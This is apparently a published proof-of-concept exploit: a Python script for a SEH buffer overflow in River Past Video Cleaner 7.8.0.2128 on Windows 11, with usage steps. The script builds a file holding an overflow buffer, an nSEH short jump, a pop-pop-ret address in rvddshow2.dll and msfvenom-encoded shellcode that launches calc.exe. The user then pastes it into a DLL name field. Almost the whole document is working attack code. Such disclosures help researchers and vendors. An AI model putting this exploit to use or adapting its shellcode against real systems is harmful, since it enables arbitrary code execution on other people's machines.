# Exploit Title: River_Past_Video_Cleaner - Buffer Overflow (SEH) # Date: 27.12.2025 # Software Link :https://river-past-video-cleaner-pro.software.informer.com/download/?ca79c7 # Exploit Author: Achilles # Tested Version: 7.8.0.2128 # Tested on: Windows 11 64bit # 1.- Run python code : River_Past_Video_Clean.py # 2.- Open EVIL.txt and copy All content to Clipboard # 3.- Open VideoCleaner.exe and click on the 'Options' inside fhe 'File' menu # 4.- Paste the Content of EVIL.txt into the 'Lame_enc.dll' name field. # 5.- Click 'OK' # 6.- Calculator Start # 7.- Greetings go:XiDreamzzXi,Metatron #!/usr/bin/env python import struct buffer = "\x41" * 280 nseh = "\xeb\x06\x90\x90" #jmp short 6 seh = struct.pack('<L',0x100111aa) #pop edi pop esiret 0x04 rvddshow2.dll nops = "\x90" * 20 #msfvenom -p windows/exec CMD=calc.exe -f py -e x86/alpha_mixed EXITFUNC=seh -b "\x00\x0a\x0d\x2f" -i 1 -f python shellcode = ("\x89\xe6\xd9\xee\xd9\x76\xf4\x5d\x55\x59\x49\x49" "\x49\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43" "\x43\x43\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30" "\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30" "\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49" "\x69\x6c\x6d\x38\x6b\x32\x33\x30\x77\x70\x65\x50" "\x33\x50\x4b\x39\x78\x65\x50\x31\x39\x50\x52\x44" "\x4c\x4b\x70\x50\x44\x70\x6c\x4b\x42\x72\x34\x4c" "\x6e\x6b\x31\x42\x64\x54\x6e\x6b\x73\x42\x67\x58" "\x36\x6f\x4f\x47\x73\x7a\x77\x56\x34\x71\x39\x6f" "\x4e\x4c\x35\x6c\x63\x51\x61\x6c\x55\x52\x44\x6c" "\x47\x50\x39\x51\x48\x4f\x64\x4d\x53\x31\x4a\x67" "\x78\x62\x79\x62\x36\x32\x71\x47\x4e\x6b\x52\x72" "\x56\x70\x6c\x4b\x63\x7a\x55\x6c\x4e\x6b\x42\x6c" "\x66\x71\x44\x38\x39\x73\x33\x78\x53\x31\x6e\x31" "\x56\x31\x6e\x6b\x32\x79\x77\x50\x65\x51\x69\x43" "\x6e\x6b\x51\x59\x45\x48\x49\x73\x45\x6a\x37\x39" "\x4c\x4b\x64\x74\x6c\x4b\x33\x31\x5a\x76\x46\x51" "\x59\x6f\x6e\x4c\x69\x51\x68\x4f\x36\x6d\x65\x51" "\x7a\x67\x35\x68\x69\x70\x51\x65\x4a\x56\x36\x63" "\x31\x6d\x39\x68\x45\x6b\x61\x6d\x66\x44\x62\x55" "\x6a\x44\x31\x48\x4c\x4b\x56\x38\x46\x44\x37\x71" "\x68\x53\x71\x76\x4c\x4b\x54\x4c\x62\x6b\x6c\x4b" "\x33\x68\x77\x6c\x76\x61\x4e\x33\x6c\x4b\x76\x64" "\x4e\x6b\x43\x31\x6e\x30\x6d\x59\x50\x44\x36\x44" "\x65\x74\x33\x6b\x71\x4b\x45\x31\x73\x69\x73\x6a" "\x52\x71\x69\x6f\x59\x70\x73\x6f\x63\x6f\x71\x4a" "\x4c\x4b\x57\x62\x48\x6b\x6c\x4d\x71\x4d\x33\x5a" "\x63\x31\x4e\x6d\x4f\x75\x6e\x52\x55\x50\x77\x70" "\x75\x50\x32\x70\x32\x48\x36\x51\x6c\x4b\x32\x4f" "\x6f\x77\x59\x6f\x79\x45\x6f\x4b\x4b\x4e\x36\x6e" "\x30\x32\x7a\x4a\x43\x58\x6d\x76\x6a\x35\x4f\x4d" "\x4d\x4d\x79\x6f\x78\x55\x65\x6c\x63\x36\x63\x4c" "\x37\x7a\x4d\x50\x6b\x4b\x69\x70\x73\x45\x73\x35" "\x4f\x4b\x32\x67\x76\x73\x73\x42\x70\x6f\x52\x4a" "\x43\x30\x56\x33\x49\x6f\x7a\x75\x72\x43\x55\x31" "\x50\x6c\x30\x63\x66\x4e\x43\x55\x50\x78\x53\x55" "\x45\x50\x41\x41") payload = buffer + nseh + seh + nops + shellcode try: f=open("Evil.txt","w") print "[+] Creating %s bytes evil payload.." %len(payload) f.write(payload) f.close() print "[+] File created!" except: print "File cannot be created"